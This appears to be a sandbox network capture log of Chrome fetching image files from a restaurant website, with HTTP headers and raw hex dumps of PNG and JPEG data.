                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:52 UTC668OUTGET /assets/imgs/Banner_dineMenu_image2.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:52 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:52 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:02 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 1271200
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:52 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 14 00 00 02 04 08 06 00 00 00 68 97 a2 fd 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 41 db 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDRhpHYsAiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:52 UTC8192INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: 8b d8 11 11 d2 d8 7d 35 4c 32 7b b4 4e 2e cf 49 11 7a 33 22 d0 5f ac 89 cb 8e 29 70 11 3b 30 e5 e6 c1 3e b7 f7 0e 38 3a 3b 61 6d 01 26 35 ea 2b 9e ea 66 bc 72 6d c6 4b 2f ee 30 39 55 be fd 60 c1 5f 0b c7 dc 9c 34 fc 6b 1f ff 22 6f 74 e7 bc b6 38 63 62 46 f0 0e e7 14 ef 1d 73 e7 89 95 70 56 2b 7b 9d b0 4e 91 9b 37 ae f1 b3 2f fd 61 5e ee 13 ff df c3 b7 78 e0 02 ba 3b 45 62 85 2c 5a 3e 5e cd b8 7d eb 69 dc fa 82 d7 56 27 2c 1c b4 5d c7 f7 cf 4e 78 6b 71 cc b3 17 6b 5e 9a de e1 63 d3 03 7e 63 f5 88 b7 52 c7 8e 78 66 e6 88 40 47 24 90 70 d1 50 51 6e 4e 66 bc 5c ed f2 c1 f9 11 4b d7 43 df f3 54 54 3e 75 f5 0e 6f 2f 0e 39 92 9e 2f ba 39 cf 5d bb c5 fd 47 0f 59 91 b8 72 e5 80 b7 4f 8f 39 5f b7 54 95 67 16 5b 76 13 3c 73 ed 36 d2 05 be 7f f4 80 ef 1d 1d 71 dc b7
                                                                                                                                                    Data Ascii: }5L2{N.Iz3"_)p;0>8:;am&5+frmK/09U`_4k"ot8cbFspV+{N7/a^x;Eb,Z>^}iV',]Nxkqk^c~cRxf@G$pPQnNf\KCTT>uo/9/9]GYrO9_Tg[v<s6q
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: a6 13 62 4a 12 43 b2 3e f6 43 43 c1 d4 b9 3c a1 62 bc 34 c5 e5 09 0f 45 cd 21 d5 40 54 b0 d4 f7 a6 66 3e a9 56 46 0e 4c 34 13 cd 12 fa 14 cd a9 33 a7 4e 73 40 6c 22 a4 20 95 af 55 55 23 66 38 ef b2 05 4e 88 48 76 98 a6 72 0e e7 50 27 d9 8e ee da ee d4 54 61 d2 78 dc d4 d9 f9 69 cf c3 e3 15 7d 2c de a2 7d 37 3e c3 39 05 38 17 7d 7d 17 54 54 53 5d 57 69 67 36 e1 d7 7f ed bf b6 b6 5b 4b 1f 7a 4b 66 92 52 2c 69 bf 25 50 c9 72 d0 44 01 d2 64 8b 9d 6c 03 3b b6 ac 0b 03 0b 4c 06 67 57 95 31 e5 35 0d d2 cf a1 00 34 a3 48 99 47 7f bc ec 38 98 4a 96 ab c5 72 a8 76 2a 82 65 19 b6 31 c8 91 37 67 12 46 0c 50 c7 74 27 23 7f 8c fc 9c 62 d8 c0 62 1d 2b cc 8c 95 a7 02 f0 8e 0c 45 2b 2c e1 42 43 53 11 49 31 84 71 b1 cd 01 4e 32 7e 4f 44 6c e0 e9 6d f8 68 5b 18 9b 99 a8 ba
                                                                                                                                                    Data Ascii: bJC>CC<b4E!@Tf>VFL43Ns@l" UU#f8NHvrP'Taxi},}7>98}}TTS]Wig6[KzKfR,i%PrDdl;LgW154HG8Jrv*e17gFPt'#bb+E+,BCSI1qN2~ODlmh[
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: 89 66 38 5b ab ba 82 00 95 75 9c 77 6b 8c 38 a6 ae a2 dd f4 9c 1e 9d f2 c2 9b b7 11 57 61 86 e6 43 b0 8d 41 09 74 eb 16 05 26 7b 3b 54 bb 3b 18 e3 20 a6 f8 e8 64 3e c7 ee 59 ce 9e 1c 73 fe e8 88 9d 5b 37 50 9f 62 6b b6 31 a9 45 dd c7 a1 bd b9 6a aa 61 3a 2c d6 d0 b7 2d be 4b 8b 0a df 07 ba 75 a0 6b 53 bb ee c1 de 14 6b e0 ab 77 cf 89 cd 02 e6 91 d3 75 a4 46 41 3d 9b a0 3c 59 ae e9 8c e5 9a cc 58 ad 5b 36 a7 17 74 1b 41 63 c5 ee 7c 82 6b 94 7e ed 71 22 2c 9a 8a 10 22 9b 36 fd bc c6 59 e6 93 1a df 75 f4 22 d4 95 23 44 a5 f7 7d fa ac 7b 3b 0c 61 d6 ab 0d 20 f8 18 70 c6 b1 3f 9f d3 76 1d 9d ef 71 ea 52 ef 7d ef a9 1b c7 bc ae 92 3b 53 61 93 63 b6 d3 ba 26 dd 70 02 9b ae e3 a4 15 8e 97 eb f4 73 1e 05 aa 99 c1 d8 29 6d 6f a1 99 61 aa 1e 2a 03 b5 60 9b 86 ba 72
                                                                                                                                                    Data Ascii: f8[uwk8WaCAt&{;T; d>Ys[7Pbk1Eja:,-KukSkwuFA=<YX[6tAc|k~q","6Yu"#D}{;a p?vqR};Sac&ps)moa*`r
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: 05 99 dd a1 97 03 c2 ec 90 be 30 84 6c c7 c9 a6 83 0d 18 75 b8 e0 b8 a8 6a 6a 76 78 e3 0b 9f e3 a7 6e ae 79 ef fe 97 39 6e 0f 50 5f b3 1b 1d e7 62 79 ef f8 0c f9 fe 5b 54 ea 88 da b3 f6 3d ab ae e5 c6 ee 0d 66 d7 0e 38 fa 7b bf c6 57 bf fe 0d 26 b3 86 37 5e 7d 99 2f 7e ef 5b d8 ae e7 67 fe d0 cf d0 9d 3d e1 ab f7 df e1 95 76 17 bb 6c f8 e9 c5 01 01 e5 57 8e 9e 60 dc 84 a6 a9 e9 42 c4 06 c5 19 a1 11 97 ec ef 29 c6 45 ec 3d 93 c9 8c 28 86 87 fe 82 93 8b 13 ea bd 3d 5e ba 7e c8 e3 93 13 36 7d cf 03 bf e2 a4 aa 38 ba 76 c0 7f 7c fc 88 2f bc fd 0e ff f0 e1 a7 f9 95 a3 f7 f8 95 a3 b7 78 bd ba ce cf 4f 9f e3 ad f6 fb 74 21 d0 58 4b 00 ba 18 38 d3 9e 8d 6f 39 74 96 5b fb 87 fc 9f 1f bd c5 4f 85 0d 7f 64 ff 25 de ba 38 e7 b7 fa 15 0f 2a e5 db 4d e0 8d 76 c3 1b f5
                                                                                                                                                    Data Ascii: 0lujjvxny9nP_by[T=f8{W&7^}/~[g=vlW`B)E=(=^~6}8v|/xOt!XK8o9t[Od%8*Mv
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: 87 bb 63 3a d3 51 55 35 d6 0a 65 55 62 cb 7a 2b d2 92 62 87 de af f0 ab 06 67 0d f8 dc 7a 6f 1d b6 2c b0 65 49 ec 9b c4 7d ad 2a 62 14 ba c6 a7 b2 10 14 7c 02 5c 47 9f 36 1e d1 7b da 79 83 d8 54 84 a5 21 b9 90 08 69 3a e8 aa 34 95 6c db 1e 17 0d 5d a7 34 4b cf 68 cf 51 d7 35 31 78 42 db f1 e4 93 47 30 bd c1 fc ef fe 16 57 2e 5d e5 89 17 9e e6 cd af 7f 9d de 47 be f2 b5 6f 31 1a ef e2 7d 64 5c 38 ba 36 12 51 9e ba 71 85 17 9e 79 2a 7d 7f a1 a7 ae 0a 2a eb 98 af 96 68 61 08 04 9c 85 8b f9 32 c7 bf f7 58 2c 3a ba 4e 79 ef f4 8c eb 57 8e f0 cb 15 0f cf 1e 52 16 8e 10 3b 3c 91 55 63 70 9e e4 b4 6e 3a 00 ce e6 2b ea d1 84 51 6d b9 7b f7 98 7b 77 57 9c 2d 1a 1e 2e 5a f6 0f 76 99 5d b4 18 15 5c e1 98 54 8e 69 65 92 53 52 1d bd b7 2c 4e 3d 84 02 e3 3a 6c 11 51 2d
                                                                                                                                                    Data Ascii: c:QU5eUbz+bgzo,eI}*b|\G6{yT!i:4l]4KhQ51xBG0W.]Go1}d\86Qqy*}*ha2X,:NyWR;<Ucpn:+Qm{{wW-.Zv]\TieSR,N=:lQ-
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: 2e cf bd 78 9d 67 9f b9 c1 ce ee 0e 0f 4f 67 9c cd 3a 66 e7 0b 3e 5e 8f f9 bd 1f fd 10 8f 1f 9f f2 ea bd 13 f6 6e dd e4 fe e5 05 75 15 d8 1f 29 a6 e9 78 e9 e9 8a 1b 4f 5d d0 5e de c5 b9 80 c1 a1 c6 52 ed 8d e9 83 e3 f3 5f 38 e5 17 bf 76 49 17 c6 c9 09 28 d9 85 82 5d 0b 7b 4f 50 eb 64 e3 cc db 8e 20 6f aa 3e 9e 40 aa 6c 45 9b 65 5d cc 9e 6a bb 0d 5e 23 d1 64 0a 73 6e eb 16 93 16 f0 84 b4 18 24 c7 54 ad 4b ae 53 f1 01 0d 91 51 3d e2 c3 1f 7a 81 6f 7e f9 15 bc f6 44 7a 46 55 c5 f1 e9 23 fa 66 c5 ee ee 88 50 58 56 8d a7 1c 55 34 5d cb e5 62 49 35 1e 51 ef d4 74 4d cf 8e ab b8 75 e5 90 8b cb 19 6d b3 4a 8e 03 67 89 99 32 68 42 82 91 0d 7e 98 a1 ef 70 38 b9 4f 0d 59 e6 eb 3a 21 53 8c d7 10 22 14 65 cd 74 3a a5 2a 2b 8a a2 64 b5 5c e5 6e 42 93 c5 2f f3 a4 13 31
                                                                                                                                                    Data Ascii: .xgOg:f>^nu)xO]^R_8vI(]{OPd o>@lEe]j^#dsn$TKSQ=zo~DzFU#fPXVU4]bI5QtMumJg2hB~p8OY:!S"et:*+d\nB/1
                                                                                                                                                    2024-10-01 04:26:52 UTC8192INData Raw: f4 c3 ac 1b d4 d2 22 59 8c 21 9a 48 db 74 38 6b 79 e6 d6 35 2e cf 72 7c 79 52 b3 98 35 f4 4d 43 f4 3d f3 45 c5 72 b5 a2 ed 3b ac 11 ae 1e ee 61 50 56 cb 15 3b 7b 23 6e 5c bf cd 0d e3 21 78 ba d0 53 ec 4f 19 d7 25 2f bf f0 34 4e 84 fb 0f 4e f9 d2 69 c3 3b a7 17 dc 7f 74 42 1f 2d 5d 88 54 b1 e0 fa d5 ab 88 b1 2c 66 0d 4d d3 d2 07 52 b1 77 76 1a 6c 04 d5 8d 50 07 a9 af ce 16 05 ce 1a 86 08 e2 72 b5 ca 7b 4a 93 a8 90 eb 8d 8b 4d 46 a5 81 ec 6c 0c b6 2c 11 1f 20 42 4f 8a 95 b9 d2 65 c0 5b 20 d5 b1 e7 0d 98 31 84 3e 24 22 64 8e d9 27 37 91 6e 77 d6 3d 61 80 4b ce a0 b4 49 73 85 6c 79 1a 7e 2d ff e8 d6 6f 37 49 08 42 a1 f7 1e 15 08 3e 20 11 f1 de ab 31 a4 b1 69 2d fd aa 51 67 44 42 51 98 3e 46 35 82 96 75 85 1a a5 89 9e 98 fa 00 73 ab 58 4e 31 0c 7b ca 14 07 4b
                                                                                                                                                    Data Ascii: "Y!Ht8ky5.r|yR5MC=Er;aPV;{#n\!xSO%/4NNi;tB-]T,fMRwvlPr{JMFl, BOe[ 1>$"d'7nw=aKIsly~-o7IB> 1i-QgDBQ>F5usXN1{K
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: 0d 79 b8 9b b8 ae 9e 11 13 f1 51 89 c1 28 45 8e 78 0f 90 73 49 ee 67 87 65 d9 78 7c 08 54 d5 2e 65 61 69 33 78 2a 75 18 3a ca 22 ad 0b 7d 48 1d ec d6 d9 34 77 f8 88 a7 a7 74 8e 18 83 76 3e a4 2a 32 9b f6 ff 7d ef e9 1e 5d 10 7c de f7 e6 0e 46 1f e3 26 db 3d c4 98 b3 60 28 b9 5a 2e bd e3 fa 3c de 65 bb 0c 64 ed d6 5c 03 e9 74 d3 05 63 8c 5b 43 75 93 7e 93 aa dd 54 b6 12 cf 31 41 66 74 48 51 48 c8 8b 8a 74 0f 4c be 36 6b e2 b3 4f e6 29 dd 02 2a 85 18 28 7e 8d 35 d7 6f fc f8 75 20 28 ae 2e 7a 7a 60 67 74 95 30 fd 6e d8 0f b8 f6 84 fd 3b 9f 60 f4 e2 4d de 79 e5 3a 37 7e c7 7f 42 ff 5f 7f 9c f9 cf fd 9f 89 17 5f c3 d2 50 c4 15 05 1e 23 47 14 e3 92 a6 99 71 fc ee cf 71 fc fe e7 b1 b6 a4 af f7 28 8a 31 85 00 24 57 56 88 3d 21 fa 7c 30 1b 73 97 16 9b 45 a0 f6 09
                                                                                                                                                    Data Ascii: yQ(ExsIgex|T.eai3x*u:"}H4wtv>*2}]|F&=`(Z.<ed\tc[Cu~T1AftHQHtL6kO)*(~5ou (.zz`gt0n;`My:7~B__P#Gqq(1$WV=!|0sE


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    97192.168.2.449864162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:52 UTC658OUTGET /assets/imgs/img_recipe_1.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:52 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:52 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 21:00:30 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 76671
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:52 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: ff d8 ff e1 16 b0 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 04 cb 00 00 01 01 00 03 00 00 00 01 03 b5 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 33 3a 30 39 3a 32 37 20 31 37 3a 30 30 3a 32 36 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: ExifMM*(1"2i$''Adobe Photoshop CC 2015 (Windows)2023:09:27 17:00:26
                                                                                                                                                    2024-10-01 04:26:52 UTC6016INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: a6 d2 c3 28 18 09 92 19 8b 2a 0f 44 e8 c2 95 5a f6 9b a1 5d ce 50 9a 62 43 24 4d 73 8d 5c d6 95 cd 50 55 6c ad 77 96 7a 07 90 37 cf 64 89 ad a5 5c 69 df 83 42 3b 2c a3 af 5b 9d d6 cb c4 5e 2f 7f 77 8f 6b 65 ec c4 52 42 90 5d 34 6a a8 99 64 04 d0 00 dc cf 1a 63 6b 7d 22 28 bf 3c 87 6d 55 0f 36 66 87 58 2c f5 d9 ac db 27 f4 3d 51 79 0f 75 47 22 28 da 8f 41 37 95 ac 77 09 87 a9 5c a5 7c 2e 8f 80 67 21 58 fe 69 ae 5e 43 64 7c 8a d9 33 12 69 fc d5 05 d1 e5 e4 a9 f5 1b ff 00 0a 39 af 69 5c 0e b9 22 eb ad 5c 9e 71 74 61 a7 5a 44 11 27 64 65 59 48 9a 19 47 63 39 fc 16 6a bd 50 ad ec d3 34 94 de 6f 42 cd d6 76 a1 09 e8 df c3 67 3f 9b 6b bb 90 88 e4 17 22 4c 39 64 59 33 d6 28 a6 6b 51 f3 98 0e 74 72 0d 57 9c 9c 51 90 8c b7 d8 79 cc 4e 3d c5 fe 2f a5 a8 f4 66 55 59
                                                                                                                                                    Data Ascii: (*DZ]PbC$Ms\PUlwz7d\iB;,[^/wkeRB]4jdck}"(<mU6fX,'=QyuG"(A7w\|.g!Xi^Cd|3i9i\"\qtaZD'deYHGc9jP4oBvg?k"L9dY3(kQtrWQyN=/fUY
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: a5 be af 47 b3 03 f9 2b b2 11 88 cc 8f d7 e6 3c 29 cd 94 2a de 96 36 aa 21 71 95 81 32 1a ae aa 03 3c d6 e3 b6 8d 51 62 5a ac 89 3a 59 5f 11 1c 85 90 c8 14 d6 af 04 55 a6 90 87 7f 16 af 13 32 48 5b 6b 05 06 91 2d 57 92 0c f6 19 83 4a 69 bd b8 ee cb 7a a4 ef d2 e8 59 4a 10 3d 9b 52 c6 23 93 9e b2 d2 8e a4 32 c9 56 27 1d 3a 9c fe 6a 5a e4 c7 1a c5 17 e9 8c 77 91 a8 dd 93 f1 d8 76 71 48 10 25 79 2a c9 7a aa be 56 86 3b 29 2c 26 36 91 a4 97 91 14 8f 19 82 76 c6 8b 76 1a 18 a0 2b 6d 72 59 17 f9 6f 22 11 5e c8 0f 0c c3 c6 c2 3b c7 54 79 61 86 54 93 f9 ee f0 bc c9 e5 24 eb 28 fa e4 f2 04 14 a5 70 ea d7 d6 d5 ed f3 e4 68 a8 31 35 3a 54 23 b5 0c d1 32 0a 15 a7 7a 96 e6 8a 2b 4f d4 ba a9 c9 af 66 f4 dc 97 79 6f 43 0a 42 84 63 7e d5 fd 4c 2a 7e c9 d3 c9 3a 51 cf 15
                                                                                                                                                    Data Ascii: G+<)*6!q2<QbZ:Y_U2H[k-WJizYJ=R#2V':jZwvqH%y*zV;),&6vv+mrYo"^;TyaT$(ph15:T#2z+OfyoCBc~L*~:Q
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: 97 4e a1 25 0f b8 ca af a6 81 b4 7a b2 07 32 ff 00 6a b5 04 e5 39 4b 57 85 63 b9 ab 99 48 03 88 33 5c c4 72 99 33 52 86 47 68 fa 73 a5 17 9a 49 92 48 ec 8a 5b 8e 34 5a 8e 3d 8d 95 33 31 2d 6e d8 d1 70 a0 c1 47 0d 54 13 6e e5 50 60 cd 1e 5a 77 9f 14 99 ee 51 4d 7c 8c 43 b3 15 f5 55 bb 82 0a 3a e7 d9 4b ad c5 bb 6a 60 b4 49 3d 8a bf 55 11 a7 54 02 fa 48 c7 0f 32 d3 5e 40 16 30 93 c3 8b 53 5e b6 e0 10 4e 82 71 03 be 86 e2 fb 96 4b 4c 15 38 00 47 98 2d 09 c6 00 c7 e8 7b f7 5b 45 ab 62 5d 8f 0a 36 ac 92 36 76 49 d2 a3 cc 47 9e b3 cf e8 c3 c4 70 ad cf cd af 08 16 87 46 d3 11 e6 3c d7 3e ea 54 9e 14 63 3e 14 55 b8 51 37 53 a9 61 e0 5d 5e c1 ed fc 4b 4b d0 7d 76 ef 27 53 6f 78 78 59 67 c1 ff 00 32 d3 56 8b ca 55 8f 34 9f 30 38 6a a1 62 fe a1 6d 30 b5 70 e3 ea fb
                                                                                                                                                    Data Ascii: N%z2j9KWcH3\r3RGhsIH[4Z=31-npGTnP`ZwQM|CU:Kj`I=UTH2^@0S^NqKL8G-{[Eb]66vIGpF<>Tc>UQ7Sa]^KK}v'SoxxYg2VU408jbm0p
                                                                                                                                                    2024-10-01 04:26:52 UTC5119INData Raw: 1d 06 76 17 15 44 2a 9c f1 1d d4 58 1c 06 02 8c 4e 22 03 54 36 0c 08 c0 e1 34 1b 70 03 db 9e 68 34 dd 35 d2 a3 15 9a 90 dc 62 29 b9 a3 dc ed a1 0a cd c4 a8 13 87 b5 42 78 c8 fd 34 ae 4c e9 c0 90 78 52 dd 56 2e 0e 18 f0 34 16 d8 d4 f9 92 07 65 43 8e d9 34 5a d3 48 18 13 34 a1 b3 c8 7a 28 6e 5d 43 b8 1a 10 fb 33 5a b5 80 d3 3a f2 ad 2a 75 34 19 76 35 d0 16 cb dd 7f e2 05 f6 6b 42 58 2a 4f 98 f0 a2 8b 80 4e 5f 49 a1 6a d2 82 e7 37 ec a8 37 16 d9 19 4e 18 d4 17 0d 78 88 06 64 49 f3 52 3b dc ea 31 00 18 c8 7b d5 a1 5e 4c f1 a2 6e ba b5 d1 8a 2c 7f 4d 0f 4d 61 98 c7 1a 7d 93 45 bd 8e f5 8b d8 b8 40 8b 5b 83 89 b4 df e1 6e a3 fe ad 2d f4 56 b0 ea 7f 17 6e c4 ea 57 5c 79 58 7b 5e 2a 6f 96 ee 1d ad 5c 53 ae c3 9f 0b 11 fc bb bf b8 f4 57 14 75 32 0f 10 7b 75 7b 74
                                                                                                                                                    Data Ascii: vD*XN"T64ph45b)Bx4LxRV.4eC4ZH4z(n]C3Z:*u4v5kBX*ON_Ij77NxdIR;1{^Ln,MMa}E@[n-VnW\yX{^*o\SWu2{u{t


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    98192.168.2.449862162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:52 UTC660OUTGET /assets/imgs/food_menu_boqt.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:52 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:52 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:30 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 17617
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:52 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
